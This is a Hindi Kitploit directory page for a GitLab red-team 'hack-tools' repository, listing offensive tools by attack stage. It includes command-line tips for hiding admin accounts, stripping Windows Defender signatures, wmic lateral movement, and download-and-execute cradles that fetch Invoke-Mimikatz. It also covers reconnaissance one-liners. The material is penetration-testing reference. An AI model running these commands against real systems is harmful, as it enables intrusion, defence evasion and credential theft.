Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Hack Tools — परियोजना जो कई पेनटेस्ट टूल्स को एक साथ लाती है | Kitploit
उपकरण/GitLabGitLab/edu0x01/hack-tools
रक्षात्मक उपकरणफ़िशिंग उपकरणविशेषाधिकार वृद्धिटोहीशोषण फ्रेमवर्कपार्श्व आंदोलनपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंगचयनित संसाधनपेलोड डेवलपमेंट
22 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitLabedu0x01/hack-tools

Hack Tools

परियोजना जो कई पेनटेस्ट टूल्स को एक साथ लाती है

रिपॉजिटरी देखेंवेबसाइट

Hack Tools

इस रिपॉजिटरी में 200+ उपकरण और संसाधन शामिल हैं जो रेड टीमिंग गतिविधियों के लिए उपयोगी हो सकते हैं।

कुछ उपकरण विशेष रूप से रेड टीमिंग के लिए डिज़ाइन किए गए हो सकते हैं, जबकि अन्य अधिक सामान्य-उद्देश्य वाले हैं और उन्हें रेड टीमिंग संदर्भ में उपयोग के लिए अनुकूलित किया जा सकता है।

चेतावनी

इस रिपॉजिटरी में मौजूद सामग्री केवल सूचना और शैक्षिक उद्देश्यों के लिए है। इसका किसी भी अवैध गतिविधि में उपयोग करने का इरादा नहीं है।

नोट

उपकरण सूची के शीर्षकों को तीर से छुपाएं।

सूची पर वापस जाने के लिए 🔙 पर क्लिक करें।

क्लोन करने का कमांड```bash

git submodule update --init --recursive

root@kitploit:~
### नया प्रोजेक्ट जोड़ें```bash
git submodule add https://github.com/example.git

docs: https://git-scm.com/book/en/v2/Git-Tools-Submodules

टूल सूची

रेड टीम टिप्स $\textcolor{gray}{\text{13 सुझाव}}$
    • स्थानीय व्यवस्थापक खाता छुपाना @Alh4zr3d
    • सिग्नेचर हटाकर विंडोज डिफेंडर को अक्षम करना @Alh4zr3d
    • प्रति उपयोगकर्ता एकाधिक RDP सत्र सक्षम करना @Alh4zr3d
    • Sysinternals PsExec.exe स्थानीय विकल्प @GuhnooPlusLinux
    • लिव ऑफ द लैंड पोर्ट स्कैनर @Alh4zr3d
    • प्रॉक्सी-अवेयर PowerShell DownloadString @Alh4zr3d
    • ब्राउज़र बुकमार्क्स में आंतरिक एंडपॉइंट्स खोजना @Alh4zr3d
    • एन्यूमरेशन के लिए DNS रिकॉर्ड्स क्वेरी करना @Alh4zr3d
    • PowerUp के बिना अनकोटेड सर्विस पाथ @Alh4zr3d
    • /k के साथ अक्षम कमांड प्रॉम्प्ट को बायपास करना Martin Sohn Christensen
    • विंडोज डिफेंडर को mimikatz.exe हटाने से रोकना @GuhnooPlusLinux
    • जाँचें कि क्या आप वर्चुअल मशीन में हैं @dmcxblue
    • AppLocker नियमों की गणना करना @Alh4zr3d
रीकॉनिसेंस $\textcolor{gray}{\text{20 उपकरण}}$
    • crt.sh -> httprobe -> EyeWitness स्वचालित डोमेन स्क्रीनशॉटिंग
    • jsendpoints पेज DOM लिंक्स निकालना
    • nuclei भेद्यता स्कैनर
    • certSniff सर्टिफिकेट ट्रांसपेरेंसी लॉग कीवर्ड स्निफर
    • gobuster वेबसाइट पाथ ब्रूट फोर्स
    • feroxbuster रस्ट में लिखा गया तेज़ कंटेंट डिस्कवरी टूल
    • CloudBrute क्लाउड इंफ्रास्ट्रक्चर ब्रूट फोर्स
    • dnsrecon DNS रिकॉर्ड्स की गणना
    • Shodan.io सार्वजनिक रूप से सुलभ सिस्टम का ज्ञानकोश
    • AORT (सभी-एक-में रीकॉन टूल) सबडोमेन एन्यूमरेशन
    • spoofcheck SPF/DMARC रिकॉर्ड जाँचकर्ता
    • AWSBucketDump S3 बकेट एन्यूमरेशन
    • GitHarvester GitHub क्रेडेंशियल खोजकर्ता
    • truffleHog GitHub क्रेडेंशियल स्कैनर
    • Dismap एसेट डिस्कवरी/पहचान
    • enum4linux विंडोज/सांबा एन्यूमरेशन
    • skanuvaty खतरनाक रूप से तेज़ DNS/नेटवर्क/पोर्ट स्कैनर
    • Metabigor API के बिना OSINT टूल
    • Gitrob GitHub संवेदनशील जानकारी स्कैनर
    • gowitness Chrome Headless का उपयोग कर वेब स्क्रीनशॉट उपयोगिता
संसाधन विकास $\textcolor{gray}{\text{8 उपकरण}}$
    • Chimera PowerShell अस्पष्टीकरण
    • msfvenom पेलोड निर्माण
    • Shellter डायनामिक शेलकोड इंजेक्शन टूल
    • Freeze पेलोड निर्माण (EDR को दरकिनार करना)
    • WordSteal Microsoft Word के साथ NTML हैश चुराना
    • WSH Wsh पेलोड
    • HTA Hta पेलोड
    • VBA Vba पेलोड
प्रारंभिक पहुँच $\textcolor{gray}{\text{6 उपकरण}}$
    • Bash Bunny USB आक्रमण उपकरण
    • EvilGoPhish फ़िशिंग अभियान ढाँचा
    • द सोशल-इंजीनियर टूलकिट फ़िशिंग अभियान ढाँचा
    • Hydra ब्रूट फोर्स उपकरण
    • SquarePhish OAuth/QR कोड फ़िशिंग ढाँचा
    • King Phisher फ़िशिंग अभियान ढाँचा
निष्पादन $\textcolor{gray}{\text{12 उपकरण}}$
    • Responder LLMNR, NBT-NS और MDNS विषैला करने वाला
    • secretsdump रिमोट हैश डंपर
    • evil-winrm WinRM शेल
    • Donut इन-मेमोरी .NET निष्पादन
    • Macro_pack मैक्रो अस्पष्टीकरण
    • PowerSploit PowerShell स्क्रिप्ट सूट
    • Rubeus एक्टिव डायरेक्टरी हैक टूल
    • SharpUp विंडोज भेद्यता पहचानकर्ता
    • SQLRecon आक्रामक MS-SQL टूलकिट
    • UltimateAppLockerByPassList सामान्य AppLocker बायपास तकनीकें
    • StarFighters जावास्क्रिप्ट और VBScript आधारित एम्पायर लॉन्चर
    • demiguise HTA एन्क्रिप्शन टूल
स्थायित्व $\textcolor{gray}{\text{4 उपकरण}}$
    • Impacket Python स्क्रिप्ट सूट
    • Empire पोस्ट-एक्सप्लॉटेशन ढाँचा
    • SharPersist विंडोज स्थायित्व टूलकिट
    • ligolo-ng TUN इंटरफ़ेस का उपयोग करने वाला टनलिंग टूल
विशेषाधिकार वृद्धि $\textcolor{gray}{\text{9 उपकरण}}$
    • LinPEAS लिनक्स विशेषाधिकार वृद्धि
    • WinPEAS विंडोज विशेषाधिकार वृद्धि
    • linux-smart-enumeration लिनक्स विशेषाधिकार वृद्धि
    • Certify एक्टिव डायरेक्टरी विशेषाधिकार वृद्धि
    • Get-GPPPassword विंडोज पासवर्ड निष्कर्षण
    • Sherlock PowerShell विशेषाधिकार वृद्धि उपकरण
    • Watson विंडोज विशेषाधिकार वृद्धि उपकरण
    • ImpulsiveDLLHijack DLL हाईजैक टूल
    • ADFSDump AD FS डंप टूल
रक्षा चोरी $\textcolor{gray}{\text{5 उपकरण}}$
    • Invoke-Obfuscation स्क्रिप्ट अस्पष्टीकरणकर्ता
    • Veil मेटास्प्लॉइट पेलोड अस्पष्टीकरणकर्ता
    • SharpBlock एंट्री पॉइंट निष्पादन रोकथाम के माध्यम से EDR बायपास
    • Alcatraz GUI x64 बाइनरी अस्पष्टीकरणकर्ता
    • Mangle संकलित निष्पादनयोग्य हेरफेर
    • AMSI Fail PowerShell स्निपेट जो AMSI को तोड़ते या अक्षम करते हैं
क्रेडेंशियल पहुँच $\textcolor{gray}{\text{9 उपकरण}}$
    • Mimikatz विंडोज क्रेडेंशियल निकालने वाला
    • LaZagne स्थानीय पासवर्ड निकालने वाला
    • hashcat पासवर्ड हैश क्रैकिंग
    • John the Ripper पासवर्ड हैश क्रैकिंग
    • SCOMDecrypt SCOM क्रेडेंशियल डिक्रिप्शन टूल
    • nanodump LSASS प्रक्रिया मिनीडंप निर्माण
    • eviltree क्रेडेंशियल खोज के लिए ट्री रीमेक
    • SeeYouCM-Thief Cisco फ़ोन सिस्टम कॉन्फ़िगरेशन फ़ाइल पार्सिंग
    • MailSniper Microsoft Exchange मेल खोजकर्ता
खोज $\textcolor{gray}{\text{6 उपकरण}}$
    • PCredz PCAP/लाइव इंटरफ़ेस पर क्रेडेंशियल खोज
    • PingCastle एक्टिव डायरेक्टरी मूल्यांकनकर्ता
    • Seatbelt स्थानीय भेद्यता स्कैनर
    • ADRecon एक्टिव डायरेक्टरी रीकॉन
    • adidnsdump एक्टिव डायरेक्टरी इंटीग्रेटेड DNS डंपिंग
    • scavenger सिस्टम की खोज के लिए स्कैनिंग टूल
पार्श्व गति $\textcolor{gray}{\text{12 उपकरण}}$
    • crackmapexec विंडोज/एक्टिव डायरेक्टरी पार्श्व गति टूलकिट
    • WMIOps WMI रिमोट कमांड
    • PowerLessShell PowerShell के बिना रिमोट PowerShell
    • PsExec हल्का टेलनेट प्रतिस्थापन
    • LiquidSnake फ़ाइल रहित पार्श्व गति
    • RDP सक्षम करना विंडोज RDP सक्षम कमांड
    • शेल को मीटरप्रेटर में अपग्रेड करना रिवर्स शेल सुधार
    • पोर्ट फ़ॉरवर्डिंग स्थानीय पोर्ट फ़ॉरवर्ड कमांड
    • Jenkins रिवर्स शेल Jenkins शेल कमांड
    • ADFSpoof AD FS सुरक्षा टोकन जालसाजी
    • kerbrute केर्बेरोस प्री-ऑथ ब्रूटफ़ोर्सिंग करने का उपकरण
    • Coercer विंडोज सर्वर को प्रमाणीकरण के लिए मजबूर करना
संग्रह $\textcolor{gray}{\text{3 उपकरण}}$
    • BloodHound एक्टिव डायरेक्टरी दृश्यीकरण
    • Snaffler एक्टिव डायरेक्टरी क्रेडेंशियल संग्राहक
    • linWinPwn एक्टिव डायरेक्टरी एन्यूमरेशन और भेद्यता जाँच
कमांड और नियंत्रण $\textcolor{gray}{\text{6 उपकरण}}$
    • Havoc कमांड और नियंत्रण ढाँचा
    • Covenant कमांड और नियंत्रण ढाँचा (.NET)
    • Merlin कमांड और नियंत्रण ढाँचा (Golang)
    • Metasploit Framework कमांड और नियंत्रण ढाँचा (Ruby)
    • Pupy कमांड और नियंत्रण ढाँचा (Python)
    • Brute Ratel कमांड और नियंत्रण ढाँचा ($$$)
बहिर्निकासी $\textcolor{gray}{\text{5 उपकरण}}$
    • Dnscat2 DNS टनलिंग के माध्यम से C2
    • Cloakify बहिर्निकासी के लिए डेटा रूपांतरण
    • PyExfil डेटा बहिर्निकासी PoC
    • Powershell RAT Python आधारित बैकडोर
    • GD-Thief Google ड्राइव बहिर्निकासी
प्रभाव $\textcolor{gray}{\text{3 उपकरण}}$
    • Conti Pentester Guide Leak Conti रैनसमवेयर समूह सहयोगी टूलकिट
    • SlowLoris सरल सेवा अभाव
    • usbkill एंटी-फोरेंसिक किल-स्विच

रेड टीम टिप्स

रेड टीमर्स से सीखें, रेड टीमिंग टिप्स के संग्रह के साथ। ये टिप्स आपकी रेड टीमिंग क्षमताओं को बेहतर बनाने के लिए विभिन्न रणनीतियों, उपकरणों और पद्धतियों को कवर करते हैं।

नोट: लगभग सभी टिप्स वर्तमान में @Alh4zr3d से हैं, वह अच्छी रेड टीम टिप्स पोस्ट करते हैं!

🔙स्थानीय व्यवस्थापक खाता छुपाना```bash

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

root@kitploit:~
**विवरण:** _'जब ब्लू टीम से बचते हुए अकाउंट बनाना जोखिम भरा है, लेकिन स्थानीय एडमिन बनाते समय, रजिस्ट्री में कुछ मजेदार जादू का उपयोग करके इसे छुपाएं।'_

**श्रेय:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**लिंक:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)

### [🔙](#tool-list)सिग्नेचर हटाकर विंडोज डिफेंडर को अपंग करें```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

विवरण: 'थोड़ा गड़बड़ है, लेकिन अगर Windows Defender आपको बहुत परेशान कर रहा है, तो इसे अक्षम करने (जो उपयोगकर्ता को सचेत करता है) के बजाय, आपको बस इसकी सभी हस्ताक्षरों को हटाकर इसे बेअसर कर देना चाहिए।'

श्रेय: @Alh4zr3d

लिंक: Twitter

🔙प्रति उपयोगकर्ता एकाधिक RDP सत्र सक्षम करें```bash

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

root@kitploit:~
**विवरण:** _'कभी-कभी आप RDP या इसी तरह के माध्यम से किसी होस्ट में लॉग इन करना चाहते हैं, लेकिन आपके उपयोगकर्ता का एक सक्रिय सत्र है। प्रति उपयोगकर्ता एकाधिक सत्र सक्षम करें।'_

**श्रेय:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**लिंक:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)

### [🔙](#tool-list)Sysinternals PsExec.exe स्थानीय विकल्प```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

Description: 'अब आप लेटरल मूवमेंट के लिए Sysinternals PsExec.exe अपलोड करने से थक गए हैं? विंडोज़ में पहले से बेहतर विकल्प इंस्टॉल है। इसके बजाय इसे आज़माएं।'

Credit: @GuhnooPlusLinux

Link: Twitter

🔙लाइव ऑफ द लैंड पोर्ट स्कैनर```bash

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null

root@kitploit:~
**विवरण:** _'जब संभव हो, मशीनों पर टूल अपलोड करने के बजाय जमीन से जीवन यापन करें (कई कारणों से)। PowerShell/.NET मदद करते हैं। उदाहरण: PowerShell में सरल पोर्ट स्कैनर।'_

**श्रेय:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**लिंक:** [ट्विटर](https://twitter.com/Alh4zr3d/status/1605060950339588096)

### [🔙](#tool-list)Proxy aware PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

विवरण: 'अधिकांश बड़े संगठन आजकल वेब प्रॉक्सी का उपयोग कर रहे हैं। मानक PowerShell डाउनलोड क्रैडल प्रॉक्सी-अवेयर नहीं है। इसका उपयोग करें।'

श्रेय: @Alh4zr3d

लिंक: Twitter

🔙ब्राउज़र बुकमार्क में आंतरिक एंडपॉइंट ढूंढना```bash

type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

root@kitploit:~
**विवरण:** _'आपको यह जानकर आश्चर्य होगा कि केवल उपयोगकर्ता के बुकमार्क से आप क्या पता लगा सकते हैं। उदाहरण के लिए, वे आंतरिक एंडपॉइंट जिन तक वे पहुँच सकते हैं।'_

**श्रेय:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**लिंक:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)

### [🔙](#tool-list)एनुमरेशन के लिए DNS रिकॉर्ड क्वेरी करें```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

विवरण: 'गणना खेल का 95% हिस्सा है। हालाँकि, पर्यावरण का मूल्यांकन करने के लिए बहुत सारे स्कैन लॉन्च करना बहुत शोरगुल वाला होता है। क्यों न सिर्फ DC/DNS सर्वर से सभी DNS रिकॉर्ड माँग लिया जाए?'

श्रेय: @Alh4zr3d

लिंक: Twitter

🔙PowerUp के बिना अनकोटेड सेवा पथ```bash

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

root@kitploit:~
**विवरण:** _'बिना PowerUp के अनक्वोटेड सेवा पथ ढूँढना'_

**क्रेडिट:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**लिंक:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)

### [🔙](#tool-list)/k के साथ अक्षम कमांड प्रॉम्प्ट को बायपास करें```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

विवरण: 'यह कमांड प्रॉम्प्ट आपके व्यवस्थापक द्वारा अक्षम किया गया है...' आमतौर पर कियोस्क पीसी जैसे वातावरणों में देखा जा सकता है। एक त्वरित हैकी समाधान विंडोज रन बॉक्स के माध्यम से /k का उपयोग करना है। यह कमांड को निष्पादित करेगा और फिर प्रतिबंध संदेश दिखाएगा, जिससे कमांड निष्पादन संभव होगा।

क्रेडिट: Martin Sohn Christensen

लिंक: ब्लॉग

🔙विंडोज डिफेंडर को mimikatz.exe को हटाने से रोकें```bash

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

root@kitploit:~
**विवरण:** _'क्या आप विंडोज डिफेंडर द्वारा mimikatz.exe को डिलीट करने से थक गए हैं? इसके बजाय यह आज़माएं।'_

**श्रेय:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)

**लिंक:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)

### [🔙](#tool-list)जांचें कि क्या आप वर्चुअल मशीन में हैं```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

विवरण: 'जानना चाहते हैं कि क्या आप वर्चुअल मशीन में हैं? रजिस्ट्री कुंजियाँ क्वेरी करें और पता लगाएं!!! यदि कोई परिणाम दिखाई देते हैं तो आप वर्चुअल मशीन में हैं।'

श्रेय: @dmcxblue

लिंक: Twitter

🔙AppLocker नियमों की गणना करें```

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

root@kitploit:~
**विवरण:** _'AppLocker एक दर्द हो सकता है। यह जानने के लिए गणना करें कि यह कितना दर्दनाक है।'_

**श्रेय:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**लिंक:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)

# टोही

### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness

मैंने एक bash one-liner बनाया है जो:

- प्रमाणपत्र संघों से उपडोमेन की सूची निष्क्रिय रूप से एकत्र करता है ([crt.sh](https://crt.sh/))
- प्रत्येक उपडोमेन का सक्रिय रूप से अनुरोध करता है ताकि उसके अस्तित्व की पुष्टि हो सके ([httprobe](https://github.com/tomnomnom/httprobe))
- मैन्युअल समीक्षा के लिए प्रत्येक उपडोमेन का सक्रिय रूप से स्क्रीनशॉट लेता है ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))

**उपयोग:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

_नोट: आपके पास httprobe, pup और EyeWitness स्थापित होना चाहिए और 'DOMAIN_COM' को लक्ष्य डोमेन में बदलना होगा। आप इस स्क्रिप्ट को टर्मिनल विंडो में एक साथ चला सकते हैं यदि आपके पास कई लक्ष्य रूट डोमेन हैं।

image

image

🔙jsendpoints

एक JavaScript बुकमार्कलेट जो पृष्ठ पर सभी वेबपेज एंडपॉइंट लिंक निकालने के लिए है।

@renniepak द्वारा बनाया गया, यह JavaScript कोड स्निपेट वर्तमान वेबपेज DOM से सभी एंडपॉइंट (/ से शुरू) निकालने के लिए उपयोग किया जा सकता है, जिसमें वेबपेज पर एम्बेड किए गए सभी बाहरी स्क्रिप्ट स्रोत शामिल हैं।```javascript javascript: (function () { var scripts = document.getElementsByTagName("script"), regex = /(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g; const results = new Set(); for (var i = 0; i < scripts.length; i++) { var t = scripts[i].src; "" != t && fetch(t) .then(function (t) { return t.text(); }) .then(function (t) { var e = t.matchAll(regex); for (let r of e) results.add(r[0]); }) .catch(function (t) { console.log("An error occurred: ", t); }); } var pageContent = document.documentElement.outerHTML, matches = pageContent.matchAll(regex); for (const match of matches) results.add(match[0]); function writeResults() { results.forEach(function (t) { document.write(t + "
"); }); } setTimeout(writeResults, 3e3); })();

root@kitploit:~
**उपयोग (बुकमार्कलेट)**

एक बुकमार्कलेट बनाएं...

- `अपनी बुकमार्क बार पर राइट क्लिक करें`
- `'Add Page' पर क्लिक करें`
- `उपरोक्त Javascript को 'url' बॉक्स में पेस्ट करें`
- `'Save' पर क्लिक करें`

...फिर ब्राउज़र में पीड़ित पेज पर जाएं और बुकमार्कलेट पर क्लिक करें।

![चित्र](https://assets.kitploit.com/production/public/readmes/495/a2a9b8ff2cacdcf419b64a6d99075dffa73471eea1201fb9a0a6b2524794849f.png)

**उपयोग (कंसोल)**

उपरोक्त Javascript को कंसोल विंडो `F12` में पेस्ट करें और एंटर दबाएं।

![चित्र](https://assets.kitploit.com/production/public/readmes/495/5dd2a02f0f6874c521b8a98f35f653b1cf1a13b00a4c7e3eaf7c111700c0cc8a.png)

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)

तेज़ असुरक्षा स्कैनर जो विशिष्ट समस्याओं की खोज के लिए .yaml टेम्पलेट का उपयोग करता है।

**स्थापित करें:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

उपयोग:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a747b7be6260c2a228ac90ac4c3500debb25dd3bf1f635c5ce736159cdd7bc81.png)

### [🔙](#tool-list)[nuclei-templates](https://github.com/projectdiscovery/nuclei-templates.git)

<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">समुदाय द्वारा संकलित टेम्पलेट्स की सूची जो nuclei इंजन के लिए अनुप्रयोगों में सुरक्षा कमजोरियाँ खोजने में सहायक है।</h4>

<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
      
<p align="center">
  <a href="https://nuclei.projectdiscovery.io/templating-guide/">दस्तावेज़ीकरण</a> •
  <a href="#-contributions">योगदान</a> •
  <a href="#-discussion">चर्चा</a> •
  <a href="#-community">समुदाय</a> •
  <a href="https://nuclei.projectdiscovery.io/faq/templates/">सामान्य प्रश्न</a> •
  <a href="https://discord.gg/projectdiscovery">DC से जुड़ें</a>
</p>

---

टेम्पलेट्स [nuclei scanner](https://github.com/projectdiscovery/nuclei) का मुख्य भाग हैं जो वास्तविक स्कैनिंग इंजन को संचालित करता है।
यह रिपॉजिटरी हमारी टीम द्वारा प्रदान किए गए तथा समुदाय द्वारा योगदान किए गए स्कैनर के लिए विभिन्न टेम्पलेट्स को संग्रहीत और संरक्षित करती है।
हम आशा करते हैं कि आप भी **पुल रिक्वेस्ट** या [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) के माध्यम से टेम्पलेट्स भेजकर इस सूची को बढ़ाने में योगदान देंगे।

## Nuclei Templates का अवलोकन

nuclei टेम्पलेट प्रोजेक्ट का एक अवलोकन, जिसमें अनूठे टैग, लेखक, निर्देशिका, गंभीरता और टेम्पलेट के प्रकार के आँकड़े शामिल हैं। नीचे दी गई तालिका में प्रत्येक मैट्रिक्स के शीर्ष दस आँकड़े हैं; इसका विस्तृत संस्करण [यहाँ उपलब्ध है](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.md), और [JSON](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.json) प्रारूप में भी उपलब्ध है।

<table>
<tr>
<td>

## Nuclei Templates शीर्ष 10 आँकड़े

| TAG       | COUNT | AUTHOR       | COUNT | DIRECTORY            | COUNT | SEVERITY | COUNT | TYPE | COUNT |
| --------- | ----- | ------------ | ----- | -------------------- | ----- | -------- | ----- | ---- | ----- |
| cve       | 1855  | dhiyaneshdk  | 835   | http                 | 5860  | info     | 2857  | file | 123   |
| panel     | 896   | dwisiswant0  | 794   | workflows            | 190   | high     | 1270  | dns  | 18    |
| wordpress | 781   | daffainfo    | 664   | file                 | 123   | medium   | 1042  |      |       |
| exposure  | 677   | pikpikcu     | 353   | network              | 93    | critical | 704   |      |       |
| wp-plugin | 672   | pdteam       | 278   | dns                  | 18    | low      | 216   |      |       |
| xss       | 646   | pussycat0x   | 240   | ssl                  | 12    | unknown  | 26    |      |       |
| osint     | 639   | geeknik      | 220   | headless             | 9     |          |       |      |       |
| tech      | 602   | ricardomaia  | 215   | TEMPLATES-STATS.json | 1     |          |       |      |       |
| edb       | 596   | ritikchaddha | 210   | contributors.json    | 1     |          |       |      |       |
| lfi       | 548   | 0x_akoko     | 179   | cves.json            | 1     |          |       |      |       |

**404 निर्देशिकाएँ, 6542 फ़ाइलें**।

</td>
</tr>
</table>

## 📖 दस्तावेज़ीकरण

कृपया नए या अपने स्वयं के **कस्टम** टेम्पलेट्स **बनाने** के लिए विस्तृत दस्तावेज़ीकरण हेतु https://nuclei.projectdiscovery.io पर जाएँ।
हमने आपको यह समझने में मदद करने के लिए कुछ टेम्पलेट्स भी जोड़े हैं कि चीज़ें कैसे काम करती हैं।

## 💪 योगदान

Nuclei-templates समुदाय के प्रमुख योगदानों से संचालित है।
[टेम्पलेट योगदान](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [सुविधा अनुरोध](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) और [बग रिपोर्ट](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) का स्वागत है।

![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")

## 💬 चर्चा

प्रश्न / संदेह / विचार हैं जिन पर चर्चा करनी है?
बेझिझक [Github चर्चा](https://github.com/projectdiscovery/nuclei-templates/discussions) बोर्ड पर चर्चा शुरू करें।

## 👨‍💻 समुदाय

आप सक्रिय [Discord समुदाय](https://discord.gg/projectdiscovery) में शामिल हो सकते हैं ताकि परियोजना अनुरक्षकों से सीधे बातचीत कर सकें और सुरक्षा और स्वचालन के बारे में दूसरों के साथ साझा कर सकें।
इसके अतिरिक्त, आप Nuclei से संबंधित सभी बातों पर अपडेट रहने के लिए [Twitter](https://twitter.com/pdnuclei) पर हमें फॉलो कर सकते हैं।

<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
  <img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&amp;max=300">
</a>
</p>

आपके योगदान और इस समुदाय को जीवंत बनाए रखने के लिए फिर से धन्यवाद। :heart:

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)

certSniff एक सर्टिफिकेट ट्रांसपेरेंसी लॉग कीवर्ड वॉचर है जिसे मैंने Python में लिखा है। यह certstream लाइब्रेरी का उपयोग करके सर्टिफिकेट निर्माण लॉग को देखता है जिसमें किसी फ़ाइल में परिभाषित कीवर्ड होते हैं।

आप इसे अपने लक्ष्य डोमेन से संबंधित कई कीवर्ड के साथ चला सकते हैं; कोई भी सर्टिफिकेट निर्माण रिकॉर्ड किया जाएगा और हो सकता है कि आपको पहले से अज्ञात डोमेन खोजने में मदद मिले।

**स्थापित करें:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

उपयोग:```python python3 certSniff.py -f example.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/5cfb98ddfd270f9f57aa774a49dd21ee41ae79bbf430e012834e9c85cf221c5e.png)

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)

पीड़ित वेबसाइट पर फ़ाइल/फ़ोल्डर पथों को ब्रूट फ़ोर्स करने के लिए बढ़िया उपकरण।

**स्थापना:**```bash
sudo apt install gobuster

उपयोग:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/49bbb3fa465f423a5b3fa1dbe2468cb9c70ad4600532825a759da5b911a2c890.png)

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)

